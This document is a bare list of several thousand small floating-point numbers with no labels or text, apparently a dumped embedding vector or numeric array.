0.014208865351974964, -0.03175894543528557, 0.010493503883481026, -0.02380615659058094, 0.02194412611424923, 0.010954661294817924, -0.016227515414357185, 0.020273517817258835, -0.006499707233160734, -0.0008641260792501271, 0.012225018814206123, -0.007239299360662699, -0.01822006329894066, 0.00031405463232658803, -0.04106910154223442, -0.017819814383983612, 0.009318857453763485, 0.004459303803741932, -0.016575559973716736, 0.004998771008104086, 0.008039798587560654, -0.011824768967926502, -0.023545125499367714, 0.00035701622255146503, 0.01801123656332493, 0.020656365901231766, -0.011468024924397469, -0.02759982831776142, -0.043192166835069656, -0.0015607563545927405, -0.008426996879279613, 0.016053494065999985, -0.017767606303095818, -0.04298333823680878, 0.004755140747874975, 0.0011626819614320993, -0.009170939214527607, -0.02236177772283554, 0.0023210132494568825, -0.010188966058194637, -0.004802996758371592, 0.0002471650659572333, 0.0024602306075394154, -0.012164111249148846, 0.003956816624850035, 0.00020039676746819168, 0.005590444430708885, -0.007213196251541376, -0.013739006593823433, -0.02897460013628006, -0.000562851142603904, 0.0038154239300638437, -0.05088392272591591, -0.029374849051237106, 0.06727676093578339, -0.010641422122716904, -0.006643275264650583, 0.007791818119585514, 0.013773811049759388, -0.001930552301928401, 0.017080221325159073, -0.06003745645284653, -0.014939756132662296, 0.030331967398524284, -0.035883259028196335, -0.008170315064489841, 0.011981388553977013, 0.006121210288256407, 0.01030207984149456, 0.02883538231253624, 0.03273346647620201, 0.04715985804796219, 0.00808765459805727, 0.002105661667883396, 0.00043967648525722325, 0.018446290865540504, 0.009136134758591652, -0.017628390341997147, -0.031776346266269684, 0.012503453530371189, -0.020656365901231766, 0.0022796832490712404, -0.018167857080698013, -0.001682571484707296, 0.05370306968688965, 0.016897499561309814, -0.0073089078068733215, 0.029740294441580772, 0.009858324192464352, 0.0057122595608234406, -0.01386952307075262, -0.01895095407962799, -0.01987326890230179, -0.005751414690166712, -0.009344960562884808, 0.03527418151497841, 0.027756448835134506, 0.014539506286382675, -0.00959729216992855, -0.02535494975745678, 0.06264778226613998, -0.03139349818229675, -0.042739707976579666, -0.024919895455241203, -0.0064387996681034565, 0.032716065645217896, 0.019734051078557968, -0.01353888213634491, -0.02497210167348385, -0.017489172518253326, -0.012573061510920525, -0.019647041335701942, -0.08025877177715302, -0.02345811389386654, 0.03731023520231247, -0.03520457446575165, -0.05119716003537178, 0.03231581300497055, -0.014861445873975754, -0.009144836105406284, 0.015427016653120518, -0.04500199109315872, 0.00102890282869339, 0.005290257278829813, -0.0034804323222488165, -0.056139372289180756, 0.004076456185430288, 0.010197666473686695, 0.0045506651513278484, 0.0012431669747456908, -0.0051988959312438965, 0.0004464742087293416, 0.017175933346152306, -0.03995536267757416, -0.01815045438706875, -0.04106910154223442, 0.010998166166245937, 0.0019359905272722244, 0.052241288125514984, -0.01593167893588543, 0.0012431669747456908, 0.026433883234858513, -0.01116348709911108, 0.03758867084980011, 0.028226306661963463, -0.03134129196405411, -0.021526474505662918, -0.009684302844107151, -0.009588590823113918, 0.027930470183491707, -0.020760778337717056, -0.056104570627212524, 0.0009837659308686852, 0.053181007504463196, 0.011067775078117847, 0.00193163997028023, -0.007443774491548538, 0.010502204298973083, -0.018202660605311394, -0.04865644499659538, -0.05084911733865738, 0.012503453530371189, -0.04865644499659538, 0.0477515310049057, -0.04778633639216423, 0.029374849051237106, 0.015566233545541763, 0.017889421433210373, -0.01895095407962799, -0.0022274767979979515, 0.011354910209774971, 0.026312068104743958, 0.0036327012348920107, -0.03616169095039368, 0.04782114177942276, 0.02577260136604309, 0.01677568443119526, 0.03055819682776928, 0.002995347138494253, -0.0142784733325243, -0.014478598721325397, 0.018046041950583458, 0.0027169124223291874, -0.024641461670398712, 0.01881173625588417, 0.015035468153655529, -0.005011822562664747, -0.032716065645217896, 0.01912497542798519, -0.031915564090013504, 0.028713567182421684, -0.042043622583150864, 0.03616169095039368, 0.006295232102274895, 0.009318857453763485, 0.001962093636393547, 0.018794335424900055, -0.03297709673643112, 0.01701931469142437, 0.028261110186576843, -0.0020121249835938215, 0.013982636854052544, -0.004824749194085598, 0.03971173241734505, 0.032228805124759674, 0.053041789680719376, -0.0010218331590294838, 0.053285419940948486, -0.008383491076529026, 0.0056034959852695465, 0.016305824741721153, 0.0027212630957365036, -0.0013073374284431338, -0.021891919896006584, 0.00942327082157135, 0.011041671968996525, -0.028139295056462288, 0.04792555421590805, 0.009875726886093616, -0.03076702170073986, 0.0063648405484855175, -0.0012562185293063521, 0.0018457167316228151, 0.012277225032448769, 0.0186725202947855, -0.010310781188309193, -0.010963361710309982, -0.0191945843398571, 0.00025192348402924836, -0.014600413851439953, -0.02187451720237732, 0.03276827186346054, -0.0015727203572168946, 0.02672971971333027, -0.05018783360719681, -0.03238542377948761, -0.03835436329245567, -0.020203908905386925, 0.005481680855154991, -0.03269866108894348, -0.0004970492445863783, -0.002971419133245945, 0.013686800375580788, -0.030088337138295174, -0.017167232930660248, -0.005825373809784651, -0.02514612302184105, 0.011285302229225636, -0.0031367396004498005, 0.005390319507569075, 0.02914862148463726, 0.010397791862487793, 0.014965859241783619, 0.0031171622686088085, -0.0022046363446861506, -0.009405868127942085, -0.010406493209302425, -0.024641461670398712, 0.019246790558099747, -0.02359733171761036, 0.012381638400256634, -0.012050997465848923, 0.04507159814238548, -0.016906199976801872, -0.01267747487872839, 0.013721604831516743, -0.02535494975745678, 0.002510261721909046, 0.010014943778514862, 0.0017336903838440776, -0.04124312475323677, -0.02725178562104702, 0.006582367699593306, 0.013947832398116589, 0.000841285742353648, -0.021543877199292183, -0.009745210409164429, -0.015157283283770084, -0.00799629371613264, 0.02587701380252838, 0.018028639256954193, 0.05074470490217209, -0.0337601937353611, -0.028887588530778885, 0.0036675056908279657, -0.03299449756741524, -0.013817316852509975, -0.007269753143191338, 0.004300509113818407, 0.02718217670917511, -0.012050997465848923, -0.02264021337032318, 0.0008586879121139646, 0.04117351397871971, 0.056139372289180756, -0.00028196940547786653, 0.007635198533535004, 0.02359733171761036, -0.029566273093223572, 0.03062780387699604, 0.02239658311009407, -0.019542627036571503, 0.0005402827518992126, -0.04475836083292961, -0.007026122882962227, -0.03167193382978439, -0.004507159814238548, 0.010415193624794483, 0.04475836083292961, -0.017776308581233025, -0.016784384846687317, -0.03797151520848274, -0.022309571504592896, 0.026190252974629402, 0.018446290865540504, 0.019490420818328857, 0.0029453157912939787, -0.0005769904237240553, 0.0049900696612894535, -0.04124312475323677, -0.01705411821603775, 0.019351202994585037, 0.009719107300043106, 0.02563338354229927, -0.03856319189071655, 0.01520948950201273, 0.01102426927536726, -0.0030736569315195084, -0.030784424394369125, -0.027373600751161575, -0.03165453299880028, 0.02921823039650917, -0.018933551385998726, -0.014017441309988499, -0.034056030213832855, 0.024676265195012093, 0.005224999040365219, 0.003047553589567542, 0.011206991970539093, 0.019525226205587387, 0.01860291138291359, -0.010275976732373238, 0.005525186192244291, 0.0141914626583457, -0.006286530755460262, 0.02756502479314804, 0.025511568412184715, 0.00887945294380188, 0.004441901575773954, 0.023371104151010513, 0.0016749580390751362, -0.013277849182486534, 0.01733255386352539, -0.007134886458516121, -0.005116235464811325, -0.016131803393363953, -0.022622810676693916, -0.010824144817888737, -0.03492613881826401, -0.013921729288995266, 0.01579246111214161, -0.003001872915774584, -0.0010354286059737206, 0.0041895704343914986, 0.003730588359758258, 0.005399020854383707, 0.02232697419822216, -0.024624058976769447, -0.011676850728690624, -0.020064692944288254, 0.05084911733865738, -0.02356252633035183, -0.017106324434280396, 0.0075568887405097485, -0.02672971971333027, 0.002779995324090123, -0.018411487340927124, -0.02232697419822216, -0.0137303052470088, -0.019455617293715477, -0.006839049514383078, 0.009101330302655697, 0.005486031528562307, 0.00476384162902832, 0.026416482403874397, -0.020760778337717056, 0.006451851688325405, 0.02411939576268196, -0.011433220468461514, -0.024606656283140182, -0.009605993516743183, 0.04155636206269264, 0.02907901257276535, 0.0061081587336957455, 0.011537632904946804, 0.012494752183556557, 0.04538483917713165, 0.028208903968334198, -0.04667259752750397, -0.0005856914795003831, -0.015801163390278816, 0.03772788494825363, 0.04802996665239334, -0.0254941675812006, 0.018063444644212723, -0.006495357025414705, 0.012164111249148846, 0.014757033437490463, 0.000965819985140115, 0.0186725202947855, 0.03678816929459572, -0.02753021940588951, 0.024763276800513268, -0.022553201764822006, -0.01536610908806324, 0.02095220237970352, 0.010545710101723671, 0.0028713566716760397, 0.025650786235928535, -0.024571852758526802, -0.036196496337652206, -0.00997143890708685, 0.00236016814596951, -0.05366826802492142, -0.012033594772219658, 0.018341878429055214, 0.008209469728171825, -0.012842795811593533, -0.029131218791007996, -0.03452588990330696, -0.015305201523005962, -0.0053076595067977905, -0.04068625345826149, 0.06320465356111526, -0.015496624633669853, 0.03744945302605629, 0.01186827477067709, 0.026486089453101158, 0.016053494065999985, -0.0009250336443074048, -0.026886340230703354, -0.02166569232940674, 0.028678761795163155, 0.004357066471129656, 0.022970853373408318, -0.013373561203479767, 0.009997542016208172, 0.0217352993786335, -0.012790588662028313, 0.006164715625345707, -0.033812399953603745, -0.00997143890708685, 0.008618420921266079, -0.020795583724975586, 0.032402824610471725, 0.0034499785397201777, 0.0014998487895354629, -0.01014546025544405, -0.005129287019371986, 0.011789964511990547, 0.01646244525909424, -0.009240548126399517, -0.03142830356955528, -0.005072730127722025, 0.001705411821603775, -0.019142378121614456, 0.0023666939232498407, -0.03259424865245819, -0.009927933104336262, -0.00752643495798111, -0.03513496369123459, -0.010328182950615883, -0.007748312316834927, 0.0201168991625309, -0.008148562163114548, 0.017393460497260094, 0.0042287250980734825, -0.011294002644717693, -0.00926665123552084, 0.0003847509215120226, 0.011998790316283703, 0.02267501689493656, 0.029705490916967392, 0.0448627732694149, -0.008896855637431145, -0.009771313518285751, 0.004903058987110853, -0.0033455656375736, -0.004172168206423521, -0.0004037845355924219, -0.05105794221162796, 0.014321979135274887, -0.023579929023981094, 0.015400913543999195, 0.010858949273824692, 0.024276016280055046, 0.003678381908684969, -0.017463069409132004, 0.009640797972679138, 0.004191745538264513, -0.01214670855551958, -0.013686800375580788, -0.03196777030825615, 0.00399162108078599, -0.006599769927561283, -0.03066260926425457, -0.029722891747951508, -0.0035369894467294216, 0.015009364113211632, 0.012686176225543022, -0.013269148766994476, 0.00022595618793275207, -0.017959030345082283, -0.0010163950501009822, -0.02873096987605095, -0.016392836347222328, 0.03224620595574379, -0.01808084547519684, 0.015957782045006752, 0.004885656759142876, -0.00183484039735049, -0.015949081629514694, 0.03311631456017494, 0.006839049514383078, -0.013182137161493301, 0.026816731318831444, 0.023005658760666847, 0.0011376662878319621, -0.015957782045006752, -0.003776269033551216, 0.007474228274077177, 0.014208865351974964, -0.016305824741721153, -0.04890007525682449, -0.004280931781977415, -0.0188465416431427, -0.035709235817193985, 0.021213235333561897, 0.004702934063971043, 0.003380369860678911, 0.035604823380708694, 0.033673182129859924, 0.007674353197216988, -0.03640532121062279, 0.008936010301113129, 0.004143889993429184, 0.019821062684059143, -0.0076656523160636425, -0.006973916199058294, -0.003606598125770688, 0.019490420818328857, -0.00904042273759842, 0.0010968800634145737, 0.028017479926347733, 0.03203738108277321, 0.038946036249399185, 0.03995536267757416, -0.00411561131477356, 0.005729661788791418, 0.00366968079470098, -0.01663646660745144, 0.010702329687774181, -0.02418900467455387, -0.021474268287420273, 0.01467872317880392, -0.04145194962620735, -0.039398495107889175, -0.02996652200818062, -0.03856319189071655, 0.013564985245466232, -0.03828475624322891, 0.011850872077047825, -0.006612821482121944, 0.03527418151497841, 0.028156697750091553, -0.018794335424900055, -0.0202909205108881, -0.000750468228943646, 0.03525678068399429, -0.0016803962644189596, -0.007130535785108805, 0.002436302602291107, 0.020795583724975586, -0.030192751437425613, 0.025006907060742378, -0.022901244461536407, 0.014887548983097076, 0.009893128648400307, -0.012024893425405025, -0.01870732381939888, 0.0026364275254309177, -0.02039533294737339, -0.0069434624165296555, 0.002388446591794491, -0.0201168991625309, 0.0031671933829784393, -0.005459928419440985, 0.016897499561309814, -0.05199765786528587, -0.0008875102503225207, -0.011346209794282913, 0.008727184496819973, 0.010885052382946014, -0.006725935731083155, 0.02759982831776142, -0.007304557599127293, -0.001619488699361682, -0.013243044726550579, 0.012259823270142078, 0.01898575760424137, -0.042635295540094376, 0.013530180789530277, 0.013251746073365211, -0.010223769582808018, 0.0050248741172254086, -0.00712183490395546, 0.00800064392387867, 0.00880984403192997, 0.02194412611424923, 0.002105661667883396, 0.0011920480756089091, -0.004011198412626982, -0.019821062684059143, 0.0046942331828176975, -0.006852101068943739, 0.00752643495798111, 0.008392192423343658, 0.012033594772219658, -0.02067376859486103, 0.014130555093288422, -0.018515899777412415, -0.020412735641002655, -0.01863771490752697, -0.02394537441432476, -0.025894416496157646, 0.013852120377123356, -0.005651351995766163, -0.019803659990429878, 0.03421264886856079, 0.02511131949722767, 0.02570299245417118, 0.01853330247104168, 0.0034391023218631744, 0.0215612780302763, -0.02735619805753231, 0.0033499160781502724, 0.012529556639492512, -0.0005987431504763663, -0.0005617635324597359, 0.01926419325172901, 0.04159116744995117, 0.009205743670463562, 0.014948456548154354, -0.01172905694693327, 0.0191945843398571, 0.022849038243293762, -0.0001011500644381158, -0.06456202268600464, 0.0068695032969117165, 0.014026142656803131, -0.016053494065999985, -0.02170049585402012, 0.010537008754909039, -0.0031911213882267475, 0.0014944106806069613, 0.022779429331421852, -0.04385344684123993, 0.009823520667850971, 0.007287155371159315, -0.011685552075505257, -0.010432596318423748, -0.00800064392387867, -0.03329033404588699, -0.0020338776521384716, 0.015801163390278816, -0.03671856224536896, 0.0039872704073786736, -0.009936634451150894, -0.013269148766994476, 0.009101330302655697, 0.015287798829376698, -0.021543877199292183, -0.02260540798306465, -0.029914315789937973, -0.014269772917032242, 0.04155636206269264, -0.010963361710309982, -0.01719333603978157, -0.04371422901749611, -0.03141090273857117, -0.0046594287268817425, -0.002897460013628006, -0.0060690040700137615, -0.02166569232940674, 0.007717858534306288, 0.030888836830854416, 0.03842397406697273, 0.01030207984149456, -0.01582726649940014, 0.0037392894737422466, 0.00822687242180109, -0.01426107157021761, 0.019768856465816498, -0.03828475624322891, -0.0006188643747009337, -0.04489757865667343, -0.033951617777347565, 0.004239601548761129, 0.020934801548719406, 0.01649724878370762, -0.030958445742726326, 0.016192711889743805, -0.013069023378193378, 0.023788755759596825, 0.005116235464811325, 0.006316984537988901, 0.00008979787526186556, 0.021422062069177628, 0.0017152006039395928, -0.00009584784129401669, -0.00864887423813343, -0.022970853373408318, 0.0038545788265764713, 0.015044168569147587, 0.0002138562558684498, -0.014904951676726341, -0.014269772917032242, 0.012033594772219658, -0.031115064397454262, -0.011015568859875202, 0.03203738108277321, -0.013956533744931221, -0.011311405338346958, -0.00838784221559763, 0.007661301642656326, -0.00887945294380188, -0.01386952307075262, 0.0065475632436573505, 0.006873853970319033, -0.018550705164670944, -0.006238675210624933, -0.019298996776342392, -0.006625873036682606, -0.025755198672413826, -0.02253579907119274, 0.01600128784775734, -0.019316399469971657, 0.005416423082351685, 0.002736489987000823, 0.027860861271619797, -0.010658823885023594, 0.010423894971609116, 0.0065475632436573505, -0.006377892103046179, -0.0054207732900977135, 0.026346873492002487, -0.02739100344479084, 0.005908033810555935, -0.019664442166686058, -0.012529556639492512, -0.00036000722320750356, -0.03506535664200783, 0.008970814757049084, -0.006343088112771511, -0.02497210167348385, -0.00007022044155746698, -0.0005655702552758157, -0.00048780435463413596, -0.05147559568285942, -0.00873588491231203, -0.0077048069797456264, -0.00904042273759842, 0.028156697750091553, -0.00313021382316947, 0.007722209207713604, -0.025581177324056625, 0.020691171288490295, 0.006042900495231152, -0.015174685046076775, 0.01473093032836914, 0.032507237046957016, 0.0077396114356815815, 0.025894416496157646, -0.031776346266269684, 0.021108822897076607, 0.046602990478277206, 0.01670607551932335, 0.015096375718712807, -0.010998166166245937, -0.014339380897581577, -0.0366489514708519, -0.015496624633669853, 0.004435375798493624, -0.0033085860777646303, 0.005007471889257431, 0.029983924701809883, 0.00499442033469677, 0.0021078367717564106, 0.0034173494204878807, 0.0344562791287899, -0.018237465992569923, -0.012816691771149635, 0.020586756989359856, -0.012233720161020756, -0.026433883234858513, 0.0013356158742681146, -0.029374849051237106, 0.015583636239171028, 0.013347458094358444, 0.023336298763751984, -0.0029300889000296593, -0.011154785752296448, -0.0003200366336386651, -0.0398857556283474, 0.01877693273127079, 0.013634594157338142, -0.01547052152454853, -0.012816691771149635, 0.03172414004802704, 0.01190307829529047, 0.013852120377123356, 0.022205159068107605, 0.0054903822019696236, 0.005055327899754047, 0.003156317165121436, -0.038876429200172424, -0.0018315775087103248, -0.04176518693566322, -0.02070857211947441, 0.02180490829050541, 0.046011317521333694, 0.0008048499585129321, -0.013234344311058521, 0.02429341711103916, -0.008061551488935947, 0.02418900467455387, -0.011433220468461514, 0.012729681096971035, -0.012538257986307144, 0.01293850690126419, 0.01214670855551958, -0.0006302845431491733, 0.03473471477627754, -0.04169557988643646, 0.0069434624165296555, -0.02067376859486103, -0.006138612516224384, -0.024206407368183136, 0.0011561560677364469, 0.004287457559257746, -0.0056295995600521564, -0.032681260257959366, 0.009901829995214939, -0.00783967413008213, -0.007330660708248615, -0.0191945843398571, 0.01835928112268448, 0.02387576550245285, 0.014339380897581577, 0.03417784720659256, 0.001631452701985836, 0.01933380216360092, 0.001642329036258161, -0.019177181646227837, 0.015983885154128075, -0.007587342523038387, 0.025720395147800446, -0.014269772917032242, -0.01125049777328968, -0.027686839923262596, 0.01252085529267788, -0.009257949888706207, 0.013338756747543812, 0.024937298148870468, -0.042878925800323486, -0.016766982153058052, 0.0015390036860480905, -0.038841623812913895, -0.0009832221549004316, -0.0025385404005646706, -0.022553201764822006, -0.013095126487314701, -0.02211814746260643, -0.004863904323428869, -0.02095220237970352, -0.02180490829050541, 0.008409595116972923, 0.08032837510108948, 0.02032572403550148, -0.010484802536666393, 0.0024101994931697845, -0.014461196027696133, 0.0015487923519685864, -0.018968356773257256, 0.010206367820501328, 0.02900940366089344, -0.03849358111619949, 0.019716648384928703, -0.014391588047146797, -0.002253579907119274, -0.009066525846719742, 0.007361114490777254, -0.02211814746260643, 0.011128682643175125, 0.02683413401246071, 0.006551913917064667, -0.014974560588598251, -0.022866440936923027, 0.02211814746260643, 0.046324554830789566, -0.00042091478826478124, 0.022239962592720985, 0.019768856465816498, -0.01666256971657276, 0.003571793669834733, -0.03824995085597038, 0.0032998849637806416, -0.004259178880602121, 0.003658804576843977, 0.014896250329911709, 0.0027973975520581007, 0.0031628429424017668, 0.011772562749683857, 0.00555563997477293, -0.0004500090144574642, -0.02869616448879242, -0.019211987033486366, -0.008505306206643581, -0.012625268660485744, -0.009205743670463562, -0.006508408579975367, 0.0013367035426199436, -0.01751527562737465, 0.0011387539561837912, -0.000986485043540597, 0.004424499813467264, 0.010928557254374027, -0.002051279880106449, -0.008435698226094246, 0.0019359905272722244, 0.01660166308283806, -0.00831823330372572, -0.019542627036571503, 0.00013935324386693537, 0.0009484178153797984, -0.012233720161020756, -0.010902454145252705, -0.002810449106618762, -0.0129211051389575, -0.005542588420212269, 0.026277264580130577, 0.01132010668516159, 0.011920480988919735, -0.02514612302184105, -0.01513988059014082, 0.017184635624289513, 0.022205159068107605, 0.011459323577582836, 0.009484178386628628, -0.013817316852509975, -0.004348365124315023, -0.022883843630552292, -0.0003494027769193053, -0.018968356773257256, 0.0009897479321807623, -0.016766982153058052, -0.022413983941078186, -0.001353018102236092, 0.017802411690354347, -0.023110071197152138, 0.02015170268714428, -0.02204853855073452, 0.020273517817258835, -0.017671896144747734, -0.0063909441232681274, 0.020134301856160164, 0.011146084405481815, 0.02338850498199463, 0.011415817774832249, 0.0011735582957044244, -0.02408459223806858, 0.004959615878760815, -0.012207616120576859, 0.01740216091275215, 0.013791212812066078, 0.002962718019261956, -0.007530785631388426, 0.013277849182486534, 0.006947813089936972, 0.007513383403420448, 0.004196096211671829, -0.005760115571320057, 0.0014976735692471266, -0.002973594469949603, 0.023144874721765518, -0.0061821178533136845, -0.01659296080470085, -0.010328182950615883, -0.0024624059442430735, -0.0035587421152740717, 0.0017456543864682317, -0.0024276014883071184, -0.017141129821538925, 0.014443794265389442, 0.02239658311009407, 0.01909017190337181, 0.00038964528357610106, -0.027756448835134506, 0.001350842765532434, -0.0129211051389575, -0.03393421694636345, 0.012050997465848923, 0.01617530919611454, 0.014922353439033031, -0.017941629514098167, 0.024885091930627823, 0.01331265363842249, -0.005403371062129736, -0.022692419588565826, 0.0256681889295578, 0.0017152006039395928, 0.00919704232364893, -0.019577432423830032, 0.001093073282390833, -0.008235572837293148, 0.007304557599127293, 0.007900581695139408, -0.025998828932642937, 0.025685591623187065, -0.0013171260943636298, 0.04019899293780327, 0.010467400774359703, 0.011459323577582836, 0.036196496337652206, 0.019594833254814148, 0.030227554962038994, 0.02001248672604561, -0.01578376069664955, -0.014147957786917686, 0.016619063913822174, -0.03442147746682167, 0.022692419588565826, -0.04374903440475464, 0.014217565767467022, -0.01164204627275467, 0.0073350113816559315, 0.017680596560239792, 0.0067346366122365, -0.0038502283859997988, 0.00998884066939354, 0.015601038001477718, 0.030227554962038994, -0.005190194584429264, 0.0021709196735173464, -0.029653282836079597, -0.017236841842532158, 0.005525186192244291, -0.004507159814238548, 0.013286550529301167, -0.01990807242691517, 0.014052245765924454, 0.01621011458337307, 0.014217565767467022, -0.0040068477392196655, 0.024206407368183136, -0.005394670180976391, -0.01582726649940014, -0.009823520667850971, 0.0033977720886468887, -0.008692380040884018, -0.00785707589238882, 0.011311405338346958, -0.0204649418592453, 0.011528932489454746, -0.008131160400807858, -0.022814234718680382, 0.018968356773257256, 0.019542627036571503, 0.02415420114994049, -0.007261051796376705, -0.02883538231253624, -0.019560029730200768, -0.011511529795825481, -0.01107647642493248, -0.012050997465848923, 0.016514651477336884, -0.006969565991312265, -0.019821062684059143, -0.01378251239657402, 0.01684529334306717, 0.02928783744573593, -0.006625873036682606, -0.0285569466650486, 0.02559858001768589, 0.0204649418592453, 0.002414549933746457, -0.0022492294665426016, 0.018376681953668594, 0.014817941002547741, 0.005116235464811325, 0.020691171288490295, 0.01520948950201273, 0.001929464633576572, 0.007817921228706837, -0.014861445873975754, 0.0038502283859997988, -0.004067755304276943, -0.010954661294817924, -0.005507784429937601, 0.0035804947838187218, -0.015775060281157494, -0.002102398779243231, 0.01269487664103508, 0.011772562749683857, -0.03076702170073986, -0.006451851688325405, 0.015400913543999195, -0.033673182129859924, 0.036057278513908386, -0.0002800660440698266, -0.01808084547519684, 0.002305786358192563, -0.01299071405082941, -0.00872283335775137, 0.0044179740361869335, 0.00010774385009426624, -0.013886924833059311, 0.003249853616580367, -0.016932303085923195, -0.004250477999448776, 0.003465205430984497, -0.03066260926425457, -0.00035021849907934666, 0.004287457559257746, -0.007374166045337915, -0.01772410236299038, 0.006995669100433588, -0.0075916931964457035, 0.018550705164670944, -0.005077080801129341, -0.01698450930416584, 0.019246790558099747, 0.011990089900791645, -0.013112529180943966, -0.014165359549224377, 0.000013077113180770539, -0.01881173625588417, 0.018237465992569923, -0.00991923175752163, 0.011633344925940037, 0.004054703749716282, -0.0070174215361475945, 0.035918060690164566, 0.008570564910769463, 0.02352772280573845, 0.0026342521887272596, 0.00562524888664484, -0.01012805849313736, 0.022483592852950096, 0.004385344684123993, -0.013060322031378746, -0.02425861358642578, -0.008366089314222336, 0.019298996776342392, -0.007561239413917065, -0.004707284737378359, 0.00815726350992918, 0.019594833254814148, 0.008996917866170406, -0.0018457167316228151, -0.02398017980158329, -0.0029757695738226175, 0.016401536762714386, -0.03786710277199745, -0.00017524520808365196, -0.006634574383497238, 0.00199907342903316, -0.0020338776521384716, -0.006895606406033039, 0.008627121336758137, -0.011206991970539093, -0.004119961988180876, 0.014043544419109821, 0.014287174679338932, 0.03995536267757416, 0.01450470183044672, -0.029618479311466217, 0.030505988746881485, 0.013591088354587555, 0.006730285938829184, 0.0026886339765042067, -0.010606617666780949, 0.0066215223632752895, 0.020517148077487946, -0.01755008101463318, -0.015975184738636017, -0.00919704232364893, 0.0067346366122365, -0.010684926994144917, 0.0021828836761415005, -0.004339664243161678, -0.002908336231485009, -0.004293983336538076, -0.014087050221860409, 0.016288423910737038, -0.017732802778482437, -0.0001732058881316334, -0.004581118933856487, 0.01877693273127079, 0.0004733931855298579, -0.0055643413215875626, -0.023057864978909492, -0.011137383989989758, -0.0005016716895624995, 0.0027169124223291874, -0.017001911997795105, -0.005834074690937996, 0.011685552075505257, 0.030227554962038994, 0.006817297078669071, 0.02904420718550682, -0.021195832639932632, 0.018515899777412415, 0.02043013833463192, 0.004441901575773954, -0.03501315042376518, -0.013460571877658367, -0.035813648253679276, 0.036126889288425446, 0.0003453241370152682, 0.0260162316262722, 0.0202909205108881, 0.01912497542798519, 0.015183386392891407, 0.008988216519355774, -0.00911003164947033, -0.031950369477272034, -0.035465605556964874, 0.027129970490932465, -0.024885091930627823, 0.0026538297533988953, 0.012955909594893456, 0.0033020603004842997, 0.00281262444332242, 0.009379765018820763, 0.007543837185949087, 0.0018511549569666386, 0.002336240140721202, 0.008696730248630047, -0.014165359549224377, -0.017454368993639946, 0.024798080325126648, -0.009980139322578907, 0.015592336654663086, 0.014835342764854431, 0.01362589281052351, 0.02060415968298912, -0.007796168327331543, 0.030610403046011925, -0.0016662570415064692, -0.013739006593823433, -0.017741503193974495, 0.020760778337717056, 0.020725974813103676, -0.0024863339494913816, -0.012277225032448769, 0.019351202994585037, 0.010545710101723671, -0.019647041335701942, -0.019072769209742546, -0.03309891000390053, -0.006469253450632095, -0.000783097289968282, 0.010023645125329494, -0.02004729025065899, -0.025581177324056625, 0.000020597090042429045, 0.00046741118421778083, 0.010745834559202194, -0.01578376069664955, -0.0042635295540094376, -0.0025494166184216738, -0.008422646671533585, -0.0007303470047190785, -0.013765109702944756, -0.017028015106916428, -0.0126600731164217, 0.03034937009215355, -0.010972063057124615, 0.025824807584285736, 0.0175761841237545, 0.000633003655821085, -0.003184595610946417, 0.0009603818180039525, -0.015870772302150726, 0.004872605204582214, -0.007039174437522888, 0.01662776619195938, 0.004968317225575447, 0.013208241201937199, -0.006295232102274895, -0.006051601842045784, -0.01369550172239542, -0.017976433038711548, 0.011694252490997314, -0.011137383989989758, 0.026886340230703354, 0.0029322642367333174, 0.022849038243293762, -0.01109387818723917, -0.0072001442313194275, 0.002510261721909046, -0.011589840054512024, 0.016645167022943497, 0.008357387967407703, -0.01891615055501461, 0.004067755304276943, -0.01538351085036993, 0.013208241201937199, -0.005747064016759396, 0.019246790558099747, -0.0017423914978280663, -0.0010756711708381772, -0.02552897110581398, 0.01260786596685648, -0.016610363498330116, -0.0022231261245906353, 0.01891615055501461, -0.0029866460245102644, -0.021648289635777473, -0.005055327899754047, -0.01870732381939888, -0.007961489260196686, -0.02359733171761036, -0.003961167298257351, -0.032333217561244965, 0.0027625930961221457, 0.03751906007528305, -0.01197268720716238, 0.0035130614414811134, 0.011328807100653648, 0.0014258896699175239, 0.0008777215261943638, 0.0199428778141737, -0.006247376091778278, -0.0023514670319855213, 0.0010321657173335552, 0.0033542667515575886, -0.009205743670463562, 0.008548812009394169, 0.018585508689284325, 0.014078348875045776, 0.011842170730233192, 0.005316360387951136, -0.012529556639492512, 0.0034608549904078245, 0.00003053875479963608, 0.008570564910769463, -0.0006661764928139746, -0.01567934826016426, -0.013356159441173077, -0.0010544622782617807, 0.010362987406551838, -0.013599789701402187, -0.0032737816218286753, -0.007069628220051527, -0.010806742124259472, 0.014643918722867966, 0.012346833944320679, 0.0000819125198177062, 0.0011496302904561162, 0.033951617777347565, 0.035674430429935455, 0.00048671671538613737, 0.0046594287268817425, 0.0050248741172254086, -0.0068216472864151, 0.006582367699593306, 0.0002144000754924491, -0.015479222871363163, 0.028348121792078018, 0.0041895704343914986, 0.010893753729760647, 0.006403995677828789, 0.025059113278985023, -0.00019713386427611113, -0.015879472717642784, -0.01624491810798645, 0.003132389159873128, 0.005072730127722025, -0.006190819200128317, 0.012077100574970245, -0.013034218922257423, -0.007878828793764114, 0.021369853988289833, 0.00508143100887537, -0.010502204298973083, 0.006965215317904949, -0.022205159068107605, -0.00431573623791337, 0.03083663061261177, 0.0018087371718138456, -0.004270055331289768, -0.004196096211671829, -0.013434468768537045, -0.028121894225478172, -0.019560029730200768, 0.004655078053474426, -0.000033988595532719046, 0.006695481948554516, -0.010728432796895504, -0.015157283283770084, 0.008004994131624699, -0.013564985245466232, 0.0009130696998909116, -0.017837215214967728, -0.003606598125770688, 0.0027647684328258038, 0.018098248168826103, 0.000014632090824306943, -0.017906824126839638, -0.012259823270142078, 0.007978891022503376, -0.00003599392584874295, -0.008653225377202034, 0.025372352451086044, 0.004307034891098738, 0.004663779400289059, -0.007939736358821392, 0.035639628767967224, 0.011285302229225636, 0.0029801202472299337, -0.02363213524222374, 0.006334386765956879, -0.011990089900791645, -0.024554450064897537, 0.0027495415415614843, -0.003393421648070216, -0.01126789953559637, -0.017219439148902893, -0.0014846218982711434, -0.02067376859486103, 0.005647001322358847, 0.008962113410234451, -0.0030845331493765116, -0.011859573423862457, -0.0005644826451316476, -0.000873914803378284, -0.0001593385386513546, 0.0032737816218286753, 0.0053076595067977905, -0.0010223770514130592, 0.008953412063419819, 0.00637354189530015, -0.0001946866832440719, 0.0062517267651855946, -0.024101994931697845, 0.012703577987849712, 0.014087050221860409, 0.005442526191473007, -0.009458075277507305, 0.02939225174486637, 0.005085781682282686, 0.002229651901870966, 0.00036762066883966327, -0.0063648405484855175, 0.004222199320793152, 0.005607846658676863, 0.008996917866170406, -0.0018315775087103248, -0.004555015824735165, 0.00499442033469677, 0.014400288462638855, 0.005921085365116596, 0.011807367205619812, -0.01520948950201273, 